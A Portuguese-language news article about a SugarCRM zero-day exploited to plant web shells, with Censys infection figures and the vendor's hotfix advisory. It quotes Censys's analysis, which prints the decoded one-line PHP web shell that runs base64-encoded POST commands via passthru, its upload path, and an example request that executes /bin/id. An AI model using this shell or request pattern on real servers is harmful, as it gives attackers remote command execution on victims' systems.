.
Nas últimas duas semanas, os hackers exploraram uma vulnerabilidade crítica no sistema SugarCRM (gerenciamento de relacionamento com o cliente) para infectar usuários com malware que lhes dá controle total de seus servidores.
A vulnerabilidade começou como um dia zero quando o código de exploração foi publicado online no final de dezembro. A pessoa que postou o exploit o descreveu como um desvio de autenticação com execução remota de código, o que significa que um invasor pode usá-lo para executar código malicioso em servidores vulneráveis sem a necessidade de credenciais. Desde então, o SugarCRM publicou um comunicado que confirma essa descrição. A postagem de exploração também incluía vários “idiotas”, que são pesquisas simples na web que as pessoas podem fazer para localizar servidores vulneráveis na Internet.
Mark Ellzey, pesquisador sênior de segurança do serviço de monitoramento de rede Censys, disse em um e-mail que, em 11 de janeiro, a empresa detectou 354 servidores SugarCRM infectados usando o dia zero. Isso é quase 12% do total de 3.059 servidores SugarCRM detectados pelo Censys. Na semana passada, as infecções eram mais altas nos EUA, com 90, seguidas pela Alemanha, Austrália e França. Em uma atualização na terça-feira, o Censys disse que o número de infecções não aumentou muito desde a postagem original.
O comunicado da SugarCRM, publicado em 5 de janeiro, disponibilizou hotfixes e disse que já havia sido aplicado ao seu serviço baseado em nuvem. Ele também aconselhou os usuários com instâncias em execução fora da hospedagem gerenciada pela SugarCloud ou SugarCRM a instalar os hotfixes. O comunicado disse que a vulnerabilidade afetou as soluções de software Sugar Sell, Serve, Enterprise, Professional e Ultimate. Não afetou o software Sugar Market.
O desvio de autenticação, disse o Censys, funciona contra o /index.php/ diretório. “Depois que o desvio de autenticação é bem-sucedido, um cookie é obtido do serviço e uma solicitação POST secundária é enviada para o caminho ‘/cache/images/sweet.phar’, que carrega um pequeno arquivo codificado em PNG contendo o código PHP que será executado pelo servidor quando outra solicitação do arquivo é feita”, acrescentaram os pesquisadores da empresa.
Quando o binário é analisado usando o software hexdump e decodificado, o código PHP se traduz aproximadamente em:
〈?php
echo “#####”;
passthru(base64_decode($_POST[“c”]));
echo “#####”;
?〉
“Este é um shell da web simples que executará comandos com base no valor do argumento de consulta codificado em base64 de ‘c’ (por exemplo, ‘POST /cache/images/sweet.phar?c=”L2Jpbi9pZA==” HTTP/1.1’, que executará o comando “/bin/id” com as mesmas permissões que o id de usuário executando o serviço da web)”, explicou o post.
Um shell da web fornece uma janela baseada em texto que os invasores podem usar como uma interface para executar comandos ou códigos de sua escolha em dispositivos comprometidos. Ellzey, da Censys, disse que a empresa não tinha visibilidade sobre exatamente para que os invasores estão usando os shells.
Os alertas do Censys e do SugarCRM fornecem indicadores de comprometimento que os clientes do SugarCRM podem usar para determinar se foram atingidos. Os usuários de produtos vulneráveis devem investigar e instalar hotfixes o mais rápido possível.
.
